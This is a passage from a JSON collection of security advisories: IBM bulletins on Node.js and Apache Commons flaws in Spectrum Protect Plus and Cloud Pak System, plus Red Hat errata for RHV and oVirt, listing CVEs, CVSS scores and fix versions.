in the service parameters. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 8.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/201046](<https://exchange.xforce.ibmcloud.com/vulnerabilities/201046>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-35516](<https://vulners.com/cve/CVE-2021-35516>) \n** DESCRIPTION: **Apache Commons Compress is vulnerable to a denial of service, caused by an out-of-memory error when large amounts of memory are allocated. By reading a specially-crafted 7Z archive, a remote attacker could exploit this vulnerability to cause a denial of service condition against services that use Compress' sevenz package. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205306](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205306>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-23382](<https://vulners.com/cve/CVE-2021-23382>) \n** DESCRIPTION: **Node.js postcss module is vulnerable to a denial of service, caused by a regular expression denial of Service (ReDoS) flaw in the getAnnotationURL() and loadAnnotation() functions in lib/previous-map.js. By sending specially-crafted regex input, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/200772](<https://exchange.xforce.ibmcloud.com/vulnerabilities/200772>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Spectrum Protect Plus| 10.1.0-10.1.8 \n \n## Remediation/Fixes\n\n**IBM Spectrum Protect** \n**Plus Release**| **First Fixing** \n**VRM Level**| **Platform**| **Link to Fix** \n---|---|---|--- \n10.1| 10.1.8.2 \n| Linux| <https://www.ibm.com/support/pages/node/6415111> \n \n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T08:54:19", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Commons and Node.js affect IBM Spectrum Protect Plus", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-21388", "CVE-2021-22918", "CVE-2021-22921", "CVE-2021-23337", "CVE-2021-23382", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", "CVE-2021-36090"], "modified": "2021-09-01T08:54:19", "id": "CF49D3C68973180FF18BD6C75A4B377A56810C21E28DDDFFBFD24EC340BB8DA8", "href": "https://www.ibm.com/support/pages/node/6484923", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:43:11", "description": "## Summary\n\nMultiple Vulnerabilities have been found in Node.js used by the Common UI in Cloud Pak System. Cloud Pak System has addressed these vulnerabilities.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-23382](<https://vulners.com/cve/CVE-2021-23382>) \n** DESCRIPTION: **Node.js postcss module is vulnerable to a denial of service, caused by a regular expression denial of Service (ReDoS) flaw in the getAnnotationURL() and loadAnnotation() functions in lib/previous-map.js. By sending specially-crafted regex input, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/200772](<https://exchange.xforce.ibmcloud.com/vulnerabilities/200772>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-32804](<https://vulners.com/cve/CVE-2021-32804>) \n** DESCRIPTION: **Node.js tar module could allow a local attacker to traverse directories on the system, caused by insufficient absolute path sanitization. An attacker could use a specially-crafted tar file containing \"dot dot\" sequences (/../) to create or overwrite arbitrary files on the system. \nCVSS Base score: 8.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/206719](<https://exchange.xforce.ibmcloud.com/vulnerabilities/206719>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N) \n \n** CVEID: **[CVE-2021-32803](<https://vulners.com/cve/CVE-2021-32803>) \n** DESCRIPTION: **Node.js tar module could allow a local attacker to traverse directories on the system, caused by insufficient symlink protection. An attacker could use a specially-crafted tar file containing \"dot dot\" sequences (/../) to create or overwrite arbitrary files on the system. \nCVSS Base score: 8.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/206717](<https://exchange.xforce.ibmcloud.com/vulnerabilities/206717>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N) \n \n** CVEID: **[CVE-2021-37713](<https://vulners.com/cve/CVE-2021-37713>) \n** DESCRIPTION: **Node.js tar module could allow a local attacker to execute arbitrary code on the system, caused by insufficient logic on Windows systems when extracting tar files that contained a path that was not an absolute path, but specified a drive letter different from the extraction target. An attacker could exploit this vulnerability to create or overwrite arbitrary files and execute arbitrary code on the system. \nCVSS Base score: 8.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208451](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208451>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N) \n \n** CVEID: **[CVE-2021-37701](<https://vulners.com/cve/CVE-2021-37701>) \n** DESCRIPTION: **Node.js tar module could allow a local attacker to execute arbitrary code on the system, caused by an arbitrary file creation/overwrite vulnerability. By creating a directory, and then replacing that directory with a symlink, an attacker could use an untrusted tar file to symlink into an arbitrary location and extract arbitrary files into that location to create or overwrite arbitrary files and execute arbitrary code on the system. \nCVSS Base score: 8.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208442](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208442>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N) \n \n** CVEID: **[CVE-2021-37712](<https://vulners.com/cve/CVE-2021-37712>) \n** DESCRIPTION: **Node.js tar module could allow a local attacker to execute arbitrary code on the system, caused by an arbitrary file creation/overwrite vulnerability. By creating a directory, and then replacing that directory with a symlink that had a different apparent name that resolved to the same entry in the filesystem, an attacker could use an untrusted tar file to symlink into an arbitrary location and extract arbitrary files into that location to create or overwrite arbitrary files and execute arbitrary code on the system. \nCVSS Base score: 8.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208450](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208450>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N) \n \n** CVEID: **[CVE-2020-7753](<https://vulners.com/cve/CVE-2020-7753>) \n** DESCRIPTION: **trim is vulnerable to a denial of service. By sending a specially crafted value, a remote attacker could exploit this vulnerability to cause a regular expression denial of service. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/190630](<https://exchange.xforce.ibmcloud.com/vulnerabilities/190630>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-33502](<https://vulners.com/cve/CVE-2021-33502>) \n** DESCRIPTION: **Node.js normalize-url module is vulnerable to a denial of service, caused by a ReDoS (regular expression denial of service) flaw in the data URLs. By using a specially-crafted regex input, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/202299](<https://exchange.xforce.ibmcloud.com/vulnerabilities/202299>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-27290](<https://vulners.com/cve/CVE-2021-27290>) \n** DESCRIPTION: **Node.js ssri module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) flaw by the SRIs. By sending a specially-crafted regex string, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198144](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198144>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-0512](<https://vulners.com/cve/CVE-2022-0512>) \n** DESCRIPTION: **unshift.io url-parse module for NPM could allow a remote attacker to bypass security restrictions, caused by improperly handeling username and password. By sending a specially-crafted request, an attacker could exploit this vulnerability to bypass hostname validation. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219768](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219768>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-0686](<https://vulners.com/cve/CVE-2022-0686>) \n** DESCRIPTION: **unshift.io url-parse module for NPM could allow a remote attacker to bypass security restrictions, caused by an issue with unable to find the correct hostname when no port number is provided in the url. By sending a specially-crafted request, an attacker could exploit this vulnerability to perform SSRF, open redirect or other attacks depends on the hostname field of parsed url. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/220105](<https://exchange.xforce.ibmcloud.com/vulnerabilities/220105>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2021-3664](<https://vulners.com/cve/CVE-2021-3664>) \n** DESCRIPTION: **url-parse could allow a remote attacker to conduct phishing attacks, caused by the mishandling of backlash \"\\\" characters in a URI. An attacker could exploit this vulnerability using a specially-crafted URL to redirect a victim to arbitrary Web sites. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/206324](<https://exchange.xforce.ibmcloud.com/vulnerabilities/206324>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-27515](<https://vulners.com/cve/CVE-2021-27515>) \n** DESCRIPTION: **url-parse could allow a remote attacker to obtain sensitive information, caused by the mishandling of certain uses of backslash such as http:\\/. By sending a specially-crafted HTTP request, an attacker could exploit this vulnerability to obtain sensitive information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/197152](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197152>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2022-0639](<https://vulners.com/cve/CVE-2022-0639>) \n** DESCRIPTION: **unshift.io url-parse module for NPM could allow a remote attacker to bypass security restrictions, caused by incorrect conversion of @ in protocol in the href. By sending a specially-crafted request, an attacker could exploit this vulnerability to bypass hostname validation. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219864](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219864>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-33623](<https://vulners.com/cve/CVE-2021-33623>) \n** DESCRIPTION: **Node.js trim-newlines module is vulnerable to a denial of service, caused by a regular expression denial-of-service (ReDoS) flaw in the .end() method. By sending a specially-crafted regex input, a remote attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/202758](<https://exchange.xforce.ibmcloud.com/vulnerabilities/202758>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-7788](<https://vulners.com/cve/CVE-2020-7788>) \n** DESCRIPTION: **Node.js ini module could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution flaw. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service condition on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192931](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192931>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2020-7662](<https://vulners.com/cve/CVE-2020-7662>) \n** DESCRIPTION: **Faye websocket-extensions npm module is vulnerable to a denial of service, caused by improper input validation by the Sec-WebSocket-Extensions header. By using a specially-crafted value in the Sec-WebSocket-Extensions header, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/183199](<https://exchange.xforce.ibmcloud.com/vulnerabilities/183199>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-23424](<https://vulners.com/cve/CVE-2021-23424>) \n** DESCRIPTION: **Node.js ansi-html module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) flaw. By sending a specially-crafted regex input, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/207801](<https://exchange.xforce.ibmcloud.com/vulnerabilities/207801>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-7774](<https://vulners.com/cve/CVE-2020-7774>) \n** DESCRIPTION: **Node.js y18n module could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution flaw. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191999](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191999>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-8203](<https://vulners.com/cve/CVE-2020-8203>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution attack. A remote attacker could exploit this vulnerability using the merge, mergeWith, and defaultsDeep functions to inject properties onto Object.prototype to crash the server and possibly execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/183560](<https://exchange.xforce.ibmcloud.com/vulnerabilities/183560>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-29059](<https://vulners.com/cve/CVE-2021-29059>) \n** DESCRIPTION: **Node.js IS-SVG module is vulnerable to a denial of service, caused by an error when the application is provided and checks a specially crafted invalid HWB string. By sending a specially crafted string, a remote attacker could exploit this vulnerability to cause a regular expression denial of service. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/204157](<https://exchange.xforce.ibmcloud.com/vulnerabilities/204157>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-28092](<https://vulners.com/cve/CVE-2021-28092>) \n** DESCRIPTION: **Node.js is-svg module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) flaw. By sending a specially-crafted regex string, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198145](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198145>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-3807](<https://vulners.com/cve/CVE-2021-3807>) \n** DESCRIPTION: **Chalk ansi-regex module for Node.js is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) flaw. By sending a specially-crafted regex input, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209596](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209596>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-3777](<https://vulners.com/cve/CVE-2021-3777>) \n** DESCRIPTION: **Node.js nodejs-tmpl module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) flaw. By sending a specially-crafted regex input, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209443](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209443>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Pak System, IBM Cloud Pak System Software, IBM Cloud Pak System Software Suite| 2.3.3.0 - 2.3.3.4 \n \n\n\n## Remediation/Fixes\n\nFor IBM Cloud Pak System v2.3.3.0, v2.3.3.1, v2.3.3.2, v2.3.3.3, v2.3.3.3 Interim Fix1, v2.3.3.4, \n\nUpgrade to Cloud Pak System v2.3.3.5 available at [FixCentral](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=PureSystems&product=ibm/WebSphere/IBM+Cloud+Pak+System&release=2.3.3.5&platform=Linux&function=all> \"FixCentral\" ).\n\nInformation on upgrading at : <http://www.ibm.com/support/docview.wss?uid=ibm10887959>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-16T15:59:59", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities in Node.js affect IBM Cloud Pak System", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2020-7662", "CVE-2020-7753", "CVE-2020-7774", "CVE-2020-7788", "CVE-2020-8203", "CVE-2021-23337", "CVE-2021-23382", "CVE-2021-23424", "CVE-2021-27290", "CVE-2021-27515", "CVE-2021-28092", "CVE-2021-29059", "CVE-2021-32803", "CVE-2021-32804", "CVE-2021-33502", "CVE-2021-33623", "CVE-2021-3664", "CVE-2021-37701", "CVE-2021-37712", "CVE-2021-37713", "CVE-2021-3777", "CVE-2021-3807", "CVE-2022-0512", "CVE-2022-0639", "CVE-2022-0686"], "modified": "2022-08-16T15:59:59", "id": "8C84F9F6803F7B599727F54AFEA8E6241BA3FD1510B15AE2524E912A02E9BC46", "href": "https://www.ibm.com/support/pages/node/6612727", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2021-11-22T18:37:09", "description": "The VDSM service is required by a Virtualization Manager to manage the Linux hosts. VDSM manages and monitors the host's storage, memory and networks as well as virtual machine creation, other host administration tasks, statistics gathering, and log collection.\n\nSecurity Fix(es):\n\n* nodejs-lodash: command injection via template (CVE-2021-23337)\n\n* nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions (CVE-2020-28500)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* An update in libvirt has changed the way block threshold events are submitted.\nAs a result, the VDSM was confused by the libvirt event, and tried to look up a drive, logging a warning about a missing drive.\nIn this release, the VDSM has been adapted to handle the new libvirt behavior, and does not log warnings about missing drives. (BZ#1948177)\n\n* Previously, when a virtual machine was powered off on the source host of a live migration and the migration finished successfully at the same time, the two events interfered with each other, and sometimes prevented migration cleanup resulting in additional migrations from the host being blocked. \nIn this release, additional migrations are not blocked. (BZ#1959436)\n\n* Previously, when failing to execute a snapshot and re-executing it later, the second try would fail due to using the previous execution data. In this release, this data will be used only when needed, in recovery mode. (BZ#1984209)", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T11:04:34", "type": "redhat", "title": "(RHSA-2021:3459) Moderate: Red Hat Virtualization Host security and bug fix update [ovirt-4.4.8]", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-23337"], "modified": "2021-09-08T13:20:35", "id": "RHSA-2021:3459", "href": "https://access.redhat.com/errata/RHSA-2021:3459", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:36:49", "description": "The ovirt-engine package provides the manager for virtualization environments.\nThis manager enables admins to define hosts and networks, as well as to add\nstorage, create VMs and manage user permissions.\n\nA list of bugs fixed in this update is available in the Technical Notes\nbook:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/html-single/technical_notes\n\nSecurity Fix(es):\n\n* nodejs-lodash: command injection via template (CVE-2021-23337)\n\n* nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions (CVE-2020-28500)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* This release adds the queue attribute to the virtio-scsi driver in the virtual machine configuration. This improvement enables multi-queue performance with the virtio-scsi driver. (BZ#911394)\n\n* With this release, source-load-balancing has been added as a new sub-option for xmit_hash_policy. It can be configured for bond modes balance-xor (2), 802.3ad (4) and balance-tlb (5), by specifying xmit_hash_policy=vlan+srcmac. (BZ#1683987)\n\n* The default DataCenter/Cluster will be set to compatibility level 4.6 on new installations of Red Hat Virtualization 4.4.6.; (BZ#1950348)\n\n* With this release, support has been added for copying disks between regular Storage Domains and Managed Block Storage Domains.\nIt is now possible to migrate disks between Managed Block Storage Domains and regular Storage Domains. (BZ#1906074)\n\n* Previously, the engine-config value LiveSnapshotPerformFreezeInEngine was set by default to false and was supposed to be uses in cluster compatibility levels below 4.4. The value was set to general version. \nWith this release, each cluster level has it's own value, defaulting to false for 4.4 and above. This will reduce unnecessary overhead in removing time outs of the file system freeze command. (BZ#1932284)\n\n* With this release, running virtual machines is supported for up to 16TB of RAM on x86_64 architectures. (BZ#1944723)\n\n* This release adds the gathering of oVirt/RHV related certificates to allow easier debugging of issues for faster customer help and issue resolution.\nInformation from certificates is now included as part of the sosreport. Note that no corresponding private key information is gathered, due to security considerations. (BZ#1845877)", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-01T11:44:38", "type": "redhat", "title": "(RHSA-2021:2179) Moderate: RHV Manager security update (ovirt-engine) [ovirt-4.4.6]", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-23337"], "modified": "2021-06-01T13:12:32", "id": "RHSA-2021:2179", "href": "https://access.redhat.com/errata/RHSA-2021:2179", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:39:47", "description": "The redhat-virtualization-host packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for 